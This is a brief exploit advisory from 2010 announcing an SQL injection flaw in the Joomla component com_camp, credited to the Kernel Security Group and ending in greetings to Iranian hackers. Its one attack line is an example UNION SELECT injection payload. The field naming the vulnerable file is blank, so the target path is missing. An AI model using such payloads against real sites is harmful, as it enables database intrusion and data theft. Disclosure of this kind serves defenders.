[+] Title : Joomla Component com_camp SQL Injection Vulnerability
[+] Author: Kernel Security Group
[+] Data: 2010-05-15
[+] Title : Joomla Component com_camp SQL Injection Vulnerability
[+] Author: Kernel Security Group By D3v1l.blackhat
[+] Homepage: http://www.KernelSec.com
[+] Email : Info@KernelSec.com
[+] Vulnerable File :[SQL]
[+] ExploiT :
[+] Example :**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--
[+] Demo:
[+] Special Thanks To My Best FriendS :
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
[+] IRANIAN Young HackerZ
[+] GreetZ : Exploit-DB TeaM